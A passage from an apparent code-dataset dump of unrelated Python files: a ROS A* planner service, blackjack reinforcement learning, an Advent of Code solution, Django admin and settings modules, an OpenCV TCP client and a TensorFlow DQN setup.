now\")\n # try:\n a_star = Astar(\n map_resolution, \n map_origin_x, \n map_origin_y,\n map_data, \n map_width, \n map_height\n )\n status, trajectory_x, trajectory_y = a_star.plan(sx, sy, gx, gy)\n print(\"a* done\")\n # if show_animation and status:\n # plt.plot(trajectory_x, trajectory_y, \"-r\")\n # plt.show()\n # plt.plot(trajectory_x, trajectory_y, \"-r\")\n # plt.show()\n print(\"returning\")\n return astarResponse(status, trajectory_x, trajectory_y) \n \n # except Exception as e:\n # trajectory_x, trajectory_y = [], []\n # print(\"Planner failed to find a path!:\", str(e))\n # return astarResponse(False, trajectory_x, trajectory_y)\n \ndef astar_server():\n rospy.init_node('astar_server')\n s = rospy.Service('astar_planner', astar, main_planner)\n print(\"Ready to plan using A*.\")\n rospy.spin()\n\nif __name__ == \"__main__\":\n while not rospy.is_shutdown():\n astar_server()\n ","repo_name":"AtharvMane/planner_cpp","sub_path":"scripts/astar_service.py","file_name":"astar_service.py","file_ext":"py","file_size_in_byte":11536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12916665988","text":"from typing import Tuple\nimport numpy as np\nimport numpy.typing as npt\nimport matplotlib.pyplot as plt\ndef value_iteration(\n V0: npt.NDArray, \n lr: float, \n gamma:float, \n epsilon: float=1e-12\n ) -> npt.NDArray:\n \n Vstar = np.copy(V0)\n while True:\n for i in range(22):\n Vdraw = 0\n for x in range(1, 11):\n pr = 1.0 if x != 10 else 4.0\n val = 0 if i+x > 21 else V0[i+x]\n Vdraw += pr/13.0 * (lr + gamma * val)\n Vstop = i\n Vstar[i] = max(Vdraw, Vstop)\n if np.amax(Vstar - V0) <= epsilon:\n break \n V0 = np.copy(Vstar)\n \n return Vstar\ndef value_to_policy(V: npt.NDArray, lr: float, gamma: float) -> npt.NDArray:\n pstar = np.zeros(V.size)\n for i in range(22):\n Vdraw = 0\n for x in range(1, 11):\n pr = 1.0 if x != 10 else 4.0\n val = 0 if i+x > 21 else V[i+x]\n Vdraw += pr/13.0 * (lr + gamma * val)\n Vstop = i\n pstar[i] = 1 if Vdraw > Vstop else 0\n return pstar\n\ndef draw() -> int:\n probs = 1/13*np.ones(10)\n probs[-1] *= 4\n return np.random.choice(np.arange(1,11), p=probs)\n\ndef Qlearn(\n Q0: npt.NDArray, \n lr: float, \n gamma: float, \n alpha: float, \n epsilon: float, \n N: int\n ) -> Tuple[npt.NDArray, npt.NDArray]:\n\n Q0[0, 1] = 1\n cur = 0\n record = np.zeros((N,3))\n for i in range(N):\n rand = np.random.random()\n action = np.argmax(Q0[cur])\n\n if rand < epsilon: # explore\n action = abs(action-1)\n \n\n\n if action == 1: # draw\n x = draw()\n next_val = 0 if cur + x > 21 else np.max(Q0[cur + x])\n reward = 0 if cur + x > 21 else lr\n Q0[cur, action] = Q0[cur, action] + alpha * (lr + gamma * next_val - Q0[cur, action])\n cur = 0 if cur + x > 21 else cur + x\n else: # stop\n reward = cur\n Q0[cur, action] = Q0[cur, action] + alpha * (cur + gamma * 0 - Q0[cur, action])\n cur = 0\n record[i][0] = cur\n record[i][1] = action\n record[i][2] = reward\n\n return Q0, record\n\ndef RL_analysis():\n lr, gamma, alpha, epsilon, N = 0, 1, 0.1, 0.1, 10000\n visits = np.zeros((22,6))\n rewards = np.zeros((N,6))\n values = np.zeros((22,6))\n\n for i in range(6):\n _, record = Qlearn(np.zeros((22,2)), lr, gamma, alpha, epsilon, 10000*i)\n vals, counts = np.unique(record[:,0], return_counts=True)\n visits[vals.astype(int),i] = counts\n _, record = Qlearn(np.zeros((22,2)), lr, gamma, alpha, 0.2*i, N)\n rewards[:,i] = record[:,2]\n vals, _ = Qlearn(np.zeros((22,2)), lr, gamma, min(0.2*i+0.1,1), epsilon, N)\n values[:,i] = np.max(vals, axis=1)\n \n plt.figure()\n plt.plot(visits)\n plt.legend(['N=0', 'N=10k', 'N=20k', 'N=30k' ,'N=40k', 'N=50k'])\n plt.title('Number of visits to each state')\n\n plt.figure()\n plt.plot(np.cumsum(rewards, axis=0))\n plt.legend(['e=0.0', 'e=0.2', 'e=0.4' ,'e=0.6', 'e=0.8', 'e=1.0'])\n plt.title('Cumulative rewards received')\n\n plt.figure()\n plt.plot(values)\n plt.legend(['a=0.1' ,'a=0.3', 'a=0.5', 'a=0.7', 'a=0.9', 'a=1.0'])\n plt.title('Estimated state values')\n\nif __name__ == \"__main__\":\n # Vstar = value_iteration(np.zeros(22), 0, 1)\n # plt.figure()\n # plt.plot(Vstar)\n # plt.title(\"Value*\")\n\n # Pstar = value_to_policy(Vstar, 0, 1)\n # plt.figure()\n # plt.plot(Pstar)\n # plt.title(\"Policy*\")\n\n # Vstar = value_iteration(np.zeros(22), 0, 0.7)\n # plt.figure()\n # plt.plot(Vstar)\n # plt.title(\"Value*\")\n\n # Pstar = value_to_policy(Vstar, 0, 0.7)\n # plt.figure()\n # plt.plot(Pstar)\n # plt.title(\"Policy*\")\n\n # Vstar = value_iteration(np.zeros(22), -1, 1)\n # plt.figure()\n # plt.plot(Vstar)\n # plt.title(\"Value*\")\n\n # Pstar = value_to_policy(Vstar, -1, 1)\n # plt.figure()\n # plt.plot(Pstar)\n # plt.title(\"Policy*\")\n\n RL_analysis()","repo_name":"cO-Oe/AIgames","sub_path":"blackjack/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31769493457","text":"\nimport math, copy, re, hashlib\nimport itertools as it\nfrom lib import check_data, parse_row, has_all_fields\n\ndef rl(arr):\n\treturn range(len(arr))\n\ndef part_1(data):\n\n\ti = 0\n\tcnt = 0\n\tcurr_data = dict()\n\twhile i <= len(data):\n\t\tif i == len(data) or data[i].strip() == \"\":\n\t\t\tif has_all_fields(curr_data): \n\t\t\t\tcnt += 1\n\t\t\tcurr_data = dict()\n\t\t\ti += 1\n\t\t\tcontinue\n\t\tcurr_data = parse_row(curr_data, data[i])\n\t\ti += 1\n\tprint(cnt)\n\tprint('END OF PART1')\n\treturn\n\ndef part_2(data):\n\ti = 0\n\tcnt = 0\n\tcurr_data = dict()\n\twhile i <= len(data):\n\t\tif i == len(data) or data[i].strip() == \"\":\n\t\t\tif has_all_fields(curr_data) and check_data(curr_data): \n\t\t\t\tcnt += 1\n\t\t\tcurr_data = dict()\n\t\t\ti += 1\n\t\t\tcontinue\n\t\tcurr_data = parse_row(curr_data, data[i])\n\t\ti += 1\n\tprint(cnt)\n\tprint('END OF PART2')\n\treturn \n\n\nif __name__ == '__main__':\n\twith open('04_input') as f:\n\t\tdata = f.read()\n\t\tdata = data.split('\\n')\n\t\t# data = list(map(int, data.split()))\n\n\n\tpart_1(copy.deepcopy(data))\n\tpart_2(copy.deepcopy(data))\n\t","repo_name":"PiErr0r/aoc","sub_path":"2020/04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41788697045","text":"from django.contrib import admin\nfrom django.conf import settings\n\nfrom .models import ThresholdSettings, Spider, TestRun, FailedRequest, Alert\n\n\nclass ThresholdSettingsAdmin(admin.ModelAdmin):\n list_display = ['n_errors_in_row', 'percent_of_failed_requests', 'notify']\nadmin.site.register(ThresholdSettings, ThresholdSettingsAdmin)\n\n\n#class FailedRequestInline(admin.StackedInline):\n# model = FailedRequest\n# max_num = 20\n\n\nclass FailedRequestAdmin(admin.ModelAdmin):\n def partial_error(self):\n return self.error[0:50] + '...' if self.error else ''\n\n list_display = ['test_run', 'request', partial_error, 'when_created']\n search_fields = ['test_run__spider__name']\n list_filter = ['test_run__spider']\n ordering = ['test_run', '-when_created']\nadmin.site.register(FailedRequest, FailedRequestAdmin)\n\n\n#class TestRunInline(admin.StackedInline):\n# model = TestRun\n# max_num = 20\n\n\nclass TestRunAdmin(admin.ModelAdmin):\n list_display = ['spider', 'status', 'when_started', 'when_finished',\n 'num_of_failed_requests', 'num_of_successful_requests']\n search_fields = ['spider__name', 'status']\n list_filter = ['spider', 'status']\n #inlines = [FailedRequestInline]\n ordering = ['spider', '-when_started']\nadmin.site.register(TestRun, TestRunAdmin)\n\n\nclass SpiderAdmin(admin.ModelAdmin):\n list_display = ['name', 'threshold_settings', 'n_errors_in_row',\n 'percent_of_failed_requests', 'notify', 'active',\n 'is_error']\n search_fields = ['name']\n list_filter = ['active']\n #inlines = [TestRunInline]\n ordering = ['name']\nadmin.site.register(Spider, SpiderAdmin)\n\n\nif settings.DEBUG:\n admin.site.register(Alert)","repo_name":"aprosdev/ecom-predictor","sub_path":"product_ranking_auto_tests/tests_app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"22747424444","text":"import numpy as np\nimport multiprocessing as mp\nfrom time import time\nfrom TCP import Frames_rcv\nimport cv2\n#For testing\ndef main():\n try:\n frame = Frames_rcv('192.168.1.112',6666,True)\n frame.start()\n while frame.is_alive(): # Real time processing loop\n frame_ = frame.get_frame(False) # Getting a fraf in form of BGR\n #frame_ = cv2.flip(frame_,0) # The rest of code here(Any kind of processing is here)\n cv2.imshow('frame',frame_) # The rest of code here(Any kind of processing is here)\n cv2.waitKey(30)\n frame.exit() # clearing the windows\n cv2.destroyAllWindows()\n except (KeyboardInterrupt,IOError,Exception,OSError)as e:\n frame.exit()\n cv2.destroyAllWindows()\n#Main For Testing\nif __name__ == '__main__':\n main()\n","repo_name":"ahmed-a-helal/real-time-action-recognition","sub_path":"communication/Backup/segmentation_pro_client.py","file_name":"segmentation_pro_client.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"36322963990","text":"import os\nimport sys\n\nimport environ\nfrom django.utils.translation import ugettext_lazy as _\n\n### We use django-environ to read secrets from .env file\nenv = environ.Env()\nenv.read_env(str((environ.Path(__file__) - 1).path(\".env\")))\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# Use the \"apps\" folder for our project apps\nsys.path.insert(0, os.path.join(BASE_DIR, \"apps\"))\n\n# `env LC_CTYPE=C tr -dc \"a-zA-Z0-9\" < /dev/random | head -c 50; echo`\nSECRET_KEY = env(\"SECRET_KEY\")\n\nDEBUG = env(\"DEBUG\", default=False)\n\nDATABASES = {\n \"default\": env.db(\"DATABASE_URL\"),\n}\n\nCACHES = {\"default\": env.cache()}\n\nALLOWED_HOSTS = [\"*\"]\n\n\nINSTALLED_APPS = [\n # FileBrowser must be loaded before Django admin\n \"tinymce\",\n \"filebrowser\",\n \"django.contrib.admin\",\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.staticfiles\",\n \"django.contrib.sites\",\n \"django_celery_beat\",\n \"django_celery_results\",\n \"django_countries\",\n \"django_filters\",\n \"corsheaders\",\n \"rest_framework\",\n # \"rest_framework_simplejwt.token_blacklist\",\n \"silk\",\n \"djmoney\",\n \"djmoney.contrib.exchange\",\n \"accounts\",\n \"catalogue\",\n]\n\nSITE_ID = 1\n\nMIDDLEWARE = [\n # \"django.middleware.cache.UpdateCacheMiddleware\",\n \"django.middleware.security.SecurityMiddleware\",\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.locale.LocaleMiddleware\",\n \"corsheaders.middleware.CorsMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"corsheaders.middleware.CorsPostCsrfMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n \"django.middleware.common.BrokenLinkEmailsMiddleware\",\n \"silk.middleware.SilkyMiddleware\",\n # \"django.middleware.cache.FetchFromCacheMiddleware\",\n]\n\nROOT_URLCONF = \"settings.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [os.path.join(BASE_DIR, \"templates\")], # templates shared between apps\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"context_processors.set_meta_tags\",\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n ],\n },\n },\n]\n\nWSGI_APPLICATION = \"settings.wsgi.application\"\n\n\n# Password validation\n# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n \"NAME\": \"django.contrib.auth.password_validation.UserAttributeSimilarityValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.MinimumLengthValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.CommonPasswordValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.NumericPasswordValidator\",\n },\n]\n\n# Cookie settings\nCSRF_COOKIE_HTTPONLY = (\n False # to allow the front-end to retrieve CSRF token from the Cookie\n)\nCSRF_COOKIE_SAMESITE = \"Strict\" # TODO: exactly what will the front-end be doing?\nCSRF_COOKIE_SECURE = True\n\n# Security headers --> already set by nginx\n# SECURE_BROWSER_XSS_FILTER = True\n# SECURE_CONTENT_TYPE_NOSNIFF = True\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/2.2/topics/i18n/\n\nLANGUAGE_CODE = \"en\"\nLANGUAGES = [\n (\"en\", _(\"English\")),\n (\"nl\", _(\"Nederlands\")),\n]\n\nTIME_ZONE = \"Europe/Amsterdam\"\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nLOCALE_PATHS = ((os.path.join(BASE_DIR, u\"locale/\")),)\n\nCURRENCIES = (\"EUR\", \"GBP\", \"USD\")\nCURRENCY_CHOICES = [(\"EUR\", \"EUR €\"), (\"GBP\", \"GBP £\"), (\"USD\", \"USD $\")]\nBASE_CURRENCY = \"EUR\"\nDEFAULT_CURRENCY = \"EUR\"\nCURRENCY_DECIMAL_PLACES = 4\nOPEN_EXCHANGE_RATES_APP_ID = env(\"OPEN_EXCHANGE_RATES_APP_ID\")\nEXCHANGE_BACKEND = \"djmoney.contrib.exchange.backends.OpenExchangeRatesBackend\"\nMOLLIE_API_KEY_LIVE = env(\"MOLLIE_API_KEY_LIVE\")\nMOLLIE_API_KEY_LIVE = env(\"MOLLIE_API_KEY_LIVE\")\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.2/howto/static-files/\n\nSTATIC_URL = \"/static/\"\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static\")\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, \"staticfiles\"),\n]\nMEDIA_URL = \"/media/\"\nMEDIA_ROOT = os.path.join(BASE_DIR, \"media\")\nPREPEND_WWW = True\nAPPEND_SLASH = True\n\nAUTH_USER_MODEL = \"accounts.UserModel\"\nLOGIN_URL = \"admin:login\"\nLOGIN_REDIRECT_URL = \"accounts:profile\"\nADMIN_BCC = []\n\nSERVER_EMAIL = \"django@mancelot.app\"\nDEFAULT_FROM_EMAIL = \"info@mancelot.app\"\nEMAIL_CONFIG = env.email_url(\"EMAIL_URL\")\nvars().update(EMAIL_CONFIG)\n\n# List of who will receive code error notifications. Not used b/c Sentry\nADMINS = [] # use tuples, i.e. (\"Full name\", \"email@example.com\")\n# List of who will receive broken link emails\nMANAGERS = []\n\n\n### Celery Task Scheduler\nCELERY_BROKER_URL = env(\"CELERY_BROKER_URL\")\nCELERY_ACCEPT_CONTENT = [\"application/json\"]\nCELERY_TASK_SERIALIZER = \"json\"\nCELERY_RESULT_SERIALIZER = \"json\"\nCELERY_RESULT_BACKEND = \"django-db\"\nCELERY_CACHE_BACKEND = \"django-cache\"\nCELERY_TIMEZONE = TIME_ZONE\n\n\n### Django REST Framework for API endpoints\nREST_FRAMEWORK = {\n \"DEFAULT_AUTHENTICATION_CLASSES\": (\n \"rest_framework_simplejwt.authentication.JWTAuthentication\",\n \"rest_framework.authentication.SessionAuthentication\",\n ),\n \"DEFAULT_PERMISSION_CLASSES\": [\"rest_framework.permissions.DjangoModelPermissions\"],\n \"DEFAULT_RENDERER_CLASSES\": [\n \"rest_framework.renderers.JSONRenderer\",\n ],\n \"DEFAULT_FILTER_BACKENDS\": [\n \"django_filters.rest_framework.DjangoFilterBackend\",\n ],\n \"DEFAULT_PAGINATION_CLASS\": \"rest_framework.pagination.PageNumberPagination\",\n \"PAGE_SIZE\": 50,\n \"TEST_REQUEST_DEFAULT_FORMAT\": \"json\",\n \"TEST_REQUEST_RENDERER_CLASSES\": [\n \"rest_framework.renderers.MultiPartRenderer\",\n \"rest_framework.renderers.JSONRenderer\",\n \"rest_framework.renderers.TemplateHTMLRenderer\",\n ],\n}\n### Django REST Simple JWT\nfrom datetime import timedelta\n\nSIMPLE_JWT = {\n \"ACCESS_TOKEN_LIFETIME\": timedelta(days=1),\n \"REFRESH_TOKEN_LIFETIME\": timedelta(days=30),\n \"ROTATE_REFRESH_TOKENS\": False,\n \"BLACKLIST_AFTER_ROTATION\": True,\n \"ALGORITHM\": \"HS256\",\n \"SIGNING_KEY\": SECRET_KEY,\n \"VERIFYING_KEY\": None,\n \"AUTH_HEADER_TYPES\": (\"Bearer\",),\n \"USER_ID_FIELD\": \"id\",\n \"USER_ID_CLAIM\": \"user_id\",\n \"AUTH_TOKEN_CLASSES\": (\n \"rest_framework_simplejwt.tokens.AccessToken\",\n ), # or SlidingToken\n \"TOKEN_TYPE_CLAIM\": \"token_type\",\n \"SLIDING_TOKEN_REFRESH_EXP_CLAIM\": \"refresh_exp\",\n \"SLIDING_TOKEN_LIFETIME\": timedelta(days=1),\n \"SLIDING_TOKEN_REFRESH_LIFETIME\": timedelta(days=30),\n}\n\n# True --> CORS_ORIGIN_WHITELIST not used and all origins will be accepted\nCORS_ORIGIN_ALLOW_ALL = False\nCORS_ORIGIN_WHITELIST = [\n \"https://mancelot.app\",\n \"https://www.mancelot.app\",\n \"http://localhost\",\n \"http://localhost:3000\",\n]\nCSRF_TRUSTED_ORIGINS = [ # TODO\n \"mancelot.app\",\n]\nCORS_ALLOW_METHODS = [ # Default, but explicitly added to settings\n \"DELETE\",\n \"GET\",\n \"OPTIONS\",\n \"PATCH\",\n \"POST\",\n \"PUT\",\n]\nCORS_ALLOW_HEADERS = [ # Default, but explicitly added to settings\n \"accept\",\n \"accept-encoding\",\n \"authorization\",\n \"content-type\",\n \"dnt\",\n \"origin\",\n \"user-agent\",\n \"x-csrftoken\",\n \"x-requested-with\",\n]\n\n# Silky for profiling / monitoring the api response times\nSILKY_AUTHENTICATION = True\nSILKY_AUTHORISATION = True # default is_staff=True; overwrite below\nSILKY_PERMISSIONS = lambda user: user.is_superuser\nSILKY_PYTHON_PROFILER = False\nSILKY_PYTHON_PROFILER_BINARY = False\n# SILKY_MAX_REQUEST_BODY_SIZE = -1 # Silk takes anything <0 as no limit\n# SILKY_MAX_RESPONSE_BODY_SIZE = 1024 # If response body>1024 bytes, ignore\n# SILKY_INTERCEPT_PERCENT = 50 # log only 50% of requests\n# SILKY_MAX_RECORDED_REQUESTS = 10**4 # garbage collection of old data\n# SILKY_MAX_RECORDED_REQUESTS_CHECK_PERCENT = 10\nSILKY_META = True # to check the effect Silk itself has on response time\n\n\n### Sentry for error reporting\nSENTRY_DSN_API = env(\"SENTRY_DSN_API\", default=\"\")\nimport sentry_sdk\nfrom sentry_sdk.integrations.django import DjangoIntegration\n\nsentry_sdk.init(\n dsn=SENTRY_DSN_API,\n integrations=[DjangoIntegration()],\n environment=env(\"SENTRY_ENVIRONMENT\"),\n)\n\nCECE_API_USER = env(\"CECE_API_USER\", default=\"secret\")\nCECE_API_PASS = env(\"CECE_API_PASS\", default=\"secret\")\nCECE_API_URI = env(\"CECE_API_URI\", default=\"http://example.com\")\n\nMANCELOT_KVK_NUMMER = env(\"MANCELOT_KVK_NUMMER\")\nMANCELOT_BTW_NUMMER = env(\"MANCELOT_BTW_NUMMER\")\n\n\n### FileBrowser to tinker with static files at the server\n# http://django-filebrowser.readthedocs.io/en/latest/settings.html\n# DIRECTORY = \"\"\nFILEBROWSER_DIRECTORY = \"\"\nFILEBROWSER_DEFAULT_PERMISSIONS = 0o644\nFILEBROWSER_OVERWRITE_EXISTING = True\nFILEBROWSER_EXTENSIONS = {\n \"Image\": [\".jpg\", \".jpeg\", \".gif\", \".png\", \".tif\", \".tiff\"],\n \"Document\": [\".pdf\", \".doc\", \".rtf\", \".txt\", \".xls\", \".csv\"],\n \"Video\": [\".mov\", \".wmv\", \".mpeg\", \".mpg\", \".avi\", \".rm\"],\n \"Audio\": [\".mp3\", \".mp4\", \".wav\", \".aiff\", \".midi\", \".m4p\"],\n}\nFILEBROWSER_ADMIN_VERSIONS = [\"big\", \"thumbnail\", \"small\", \"medium\", \"large\"]\n\n\n### TinyMCE as WYSIWYG editor in the FileBrowser\n# https://www.tinymce.com/docs/demo/full-featured/\nTINYMCE_DEFAULT_CONFIG = {\n \"selector\": \"textarea\",\n \"height\": 500,\n \"theme\": \"modern\",\n \"plugins\": [\n \"advlist autolink lists link image charmap print preview hr anchor pagebreak\",\n \"searchreplace wordcount visualblocks visualchars code fullscreen\",\n \"insertdatetime media nonbreaking save table contextmenu directionality\",\n \"emoticons template paste textcolor colorpicker textpattern imagetools codesample toc\",\n ],\n \"toolbar1\": \"undo redo | insert | styleselect | bold italic | alignleft aligncenter alignright alignjustify | bullist numlist outdent indent | link image\",\n \"toolbar2\": \"print preview image | forecolor backcolor emoticons | codesample\",\n \"image_advtab\": True,\n \"templates\": [\n {\"title\": \"Test template 1\", \"content\": \"Test 1\"},\n {\"title\": \"Test template 2\", \"content\": \"Test 2\"},\n ],\n \"content_css\": [\n \"//www.tinymce.com/css/codepen.min.css\",\n # \"/static/css/main.css\",\n ],\n}\n# TINYMCE_SPELLCHECKER = True\nTINYMCE_COMPRESSOR = True\nTINYMCE_FILEBROWSER = True\nTINYMCE_MINIMAL_CONFIG = {\n \"selector\": \"textarea\",\n \"height\": 80,\n \"width\": 500,\n \"menubar\": False,\n \"statusbar\": False,\n \"elementpath\": False,\n \"plugins\": [\n \"link paste autolink code\",\n ],\n \"toolbar1\": \"undo redo | bold italic | bullist numlist outdent indent | link code\",\n \"toolbar2\": \"\",\n}\n\n\nimport logging\n\nLOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"verbose\": {\n \"format\": \"{levelname} {asctime} {module} {process:d} {thread:d} {message}\",\n \"style\": \"{\",\n },\n \"simple\": {\n \"format\": \"{levelname} {message}\",\n \"style\": \"{\",\n },\n \"console\": {\n \"format\": \"{message}\",\n \"style\": \"{\",\n },\n },\n \"filters\": {\n \"require_debug_true\": {\n \"()\": \"django.utils.log.RequireDebugTrue\",\n },\n },\n \"handlers\": {\n \"file\": {\n \"level\": \"INFO\",\n \"class\": \"logging.FileHandler\",\n \"filename\": \"log/request.log\",\n },\n \"mail_admins\": {\n \"level\": \"ERROR\",\n \"class\": \"django.utils.log.AdminEmailHandler\",\n },\n \"console\": {\n \"level\": \"DEBUG\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"console\",\n },\n },\n \"loggers\": {\n \"django.request\": {\n \"handlers\": [\"file\"],\n \"level\": \"WARNING\",\n \"propagate\": True,\n },\n \"file\": {\n \"handlers\": [\"file\"],\n \"level\": \"DEBUG\",\n \"propagate\": True,\n },\n \"console\": {\n \"handlers\": [\"console\"],\n \"level\": \"DEBUG\",\n \"propagate\": False,\n },\n },\n}\n\nif DEBUG or True:\n PREPEND_WWW = False\n\n INSTALLED_APPS += [\n \"django_extensions\",\n ]\n\n REST_FRAMEWORK[\"DEFAULT_RENDERER_CLASSES\"] += [\n \"rest_framework.renderers.BrowsableAPIRenderer\",\n ]\n","repo_name":"tlrh314/mancelot","sub_path":"backend/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":12840,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"15104733572","text":"import math\nimport numpy as np\nimport os\nimport tensorflow as tf\n\nimport state\nfrom state import State\n\nclass GradientClippingOptimizer(tf.compat.v1.train.Optimizer):\n def __init__(self, optimizer, use_locking=False, name=\"GradientClipper\"):\n super(GradientClippingOptimizer, self).__init__(use_locking, name)\n self.optimizer = optimizer\n\n def compute_gradients(self, *args, **kwargs):\n grads_and_vars = self.optimizer.compute_gradients(*args, **kwargs)\n clipped_grads_and_vars = []\n for (grad, var) in grads_and_vars:\n if grad is not None:\n clipped_grads_and_vars.append((tf.clip_by_value(grad, -1, 1), var))\n else:\n clipped_grads_and_vars.append((grad, var))\n return clipped_grads_and_vars\n\n def apply_gradients(self, *args, **kwargs):\n return self.optimizer.apply_gradients(*args, **kwargs)\n\nclass DeepQNetwork:\n def __init__(self, numActions, baseDir, args):\n \n self.numActions = numActions\n self.baseDir = baseDir\n self.saveModelFrequency = args.save_model_freq\n self.targetModelUpdateFrequency = args.target_model_update_freq\n self.tensorboardFrequency = args.tensorboard_logging_freq\n self.normalizeWeights = args.normalize_weights\n self.gamma = args.gamma\n self.step_frames = args.frame\n\n self.staleSess = None\n \n self.sess = tf.Session()\n \n assert (len(tf.compat.v1.global_variables()) == 0),\"Expected zero variables\"\n self.x, self.y = self.buildNetwork('policy', True, numActions)\n assert (len(tf.compat.v1.trainable_variables()) == 10),\"Expected 10 trainable_variables\"\n assert (len(tf.compat.v1.global_variables()) == 10),\"Expected 10 total variables\"\n self.x_target, self.y_target = self.buildNetwork('target', False, numActions)\n assert (len(tf.compat.v1.trainable_variables()) == 10),\"Expected 10 trainable_variables\"\n assert (len(tf.compat.v1.global_variables()) == 20),\"Expected 20 total variables\"\n\n # build the variable copy ops\n self.update_target = []\n trainable_variables = tf.compat.v1.trainable_variables()\n all_variables = tf.compat.v1.global_variables()\n for i in range(0, len(trainable_variables)):\n self.update_target.append(all_variables[len(trainable_variables) + i].assign(trainable_variables[i]))\n\n self.a = tf.compat.v1.placeholder(tf.float32, shape=[None, numActions])\n print('a %s' % (self.a.get_shape()))\n self.y_ = tf.compat.v1.placeholder(tf.float32, [None])\n print('y_ %s' % (self.y_.get_shape()))\n\n self.y_a = tf.reduce_sum(tf.multiply(self.y, self.a), reduction_indices=1)\n print('y_a %s' % (self.y_a.get_shape()))\n\n difference = tf.abs(self.y_a - self.y_)\n quadratic_part = tf.clip_by_value(difference, 0.0, 1.0)\n linear_part = difference - quadratic_part\n errors = (0.5 * tf.square(quadratic_part)) + linear_part\n self.loss = tf.reduce_sum(errors)\n\n tf.compat.v1.summary.scalar('loss', self.loss)\n\n optimizer = tf.compat.v1.train.RMSPropOptimizer(args.learning_rate, decay=.95, epsilon=.01)\n self.train_step = optimizer.minimize(self.loss)\n\n self.saver = tf.compat.v1.train.Saver()\n\n self.merged = tf.compat.v1.summary.merge_all()\n self.summary_writer = tf.compat.v1.summary.FileWriter(self.baseDir + '/tensorboard', self.sess.graph)\n\n if args.model is not None:\n print('Loading from model file %s' % (args.model))\n #self.saver = tf.compat.v1.train.import_meta_graph(args.model + '.meta')\n #self.saver.restore(self.sess, args.model)\n self.saver.restore(self.sess, tf.train.latest_checkpoint(args.model))\n else:\n # Initialize variables\n self.sess.run(tf.compat.v1.global_variables_initializer())\n self.sess.run(self.update_target) # is this necessary?\n\n def buildNetwork(self, name, trainable, numActions):\n \n print(\"Building network for %s trainable=%s\" % (name, trainable))\n\n # First layer takes a screen, and shrinks by 2x\n x = tf.compat.v1.placeholder(tf.uint8, shape=[None, State.IMAGE_SIZE, State.IMAGE_SIZE, self.step_frames], name=\"screens\")\n print(x)\n\n x_normalized = tf.to_float(x) / 255.0\n print(x_normalized)\n\n # Second layer convolves 32 8x8 filters with stride 4 with relu\n with tf.compat.v1.variable_scope(\"cnn1_\" + name):\n W_conv1, b_conv1 = self.makeLayerVariables([8, 8, self.step_frames, 16], trainable, \"conv1\")\n\n h_conv1 = tf.nn.relu(tf.nn.conv2d(x_normalized, W_conv1, strides=[1, 4, 4, 1], padding='VALID') + b_conv1, name=\"h_conv1\")\n print(h_conv1)\n\n # Third layer convolves 64 4x4 filters with stride 2 with relu\n with tf.compat.v1.variable_scope(\"cnn2_\" + name):\n W_conv2, b_conv2 = self.makeLayerVariables([4, 4, 16, 32], trainable, \"conv2\")\n\n h_conv2 = tf.nn.relu(tf.nn.conv2d(h_conv1, W_conv2, strides=[1, 2, 2, 1], padding='VALID') + b_conv2, name=\"h_conv2\")\n print(h_conv2)\n\n # Fourth layer convolves 64 3x3 filters with stride 1 with relu\n with tf.compat.v1.variable_scope(\"cnn3_\" + name):\n W_conv3, b_conv3 = self.makeLayerVariables([3, 3, 32, 32], trainable, \"conv3\")\n\n h_conv3 = tf.nn.relu(tf.nn.conv2d(h_conv2, W_conv3, strides=[1, 1, 1, 1], padding='VALID') + b_conv3, name=\"h_conv3\")\n print(h_conv3)\n\n h_conv3_flat = tf.reshape(h_conv3, [-1, 7 * 7 * 32], name=\"h_conv3_flat\")\n print(h_conv3_flat)\n\n # Fifth layer is fully connected with 512 relu units\n with tf.compat.v1.variable_scope(\"fc1_\" + name):\n W_fc1, b_fc1 = self.makeLayerVariables([7 * 7 * 32, 256], trainable, \"fc1\")\n\n h_fc1 = tf.nn.relu(tf.matmul(h_conv3_flat, W_fc1) + b_fc1, 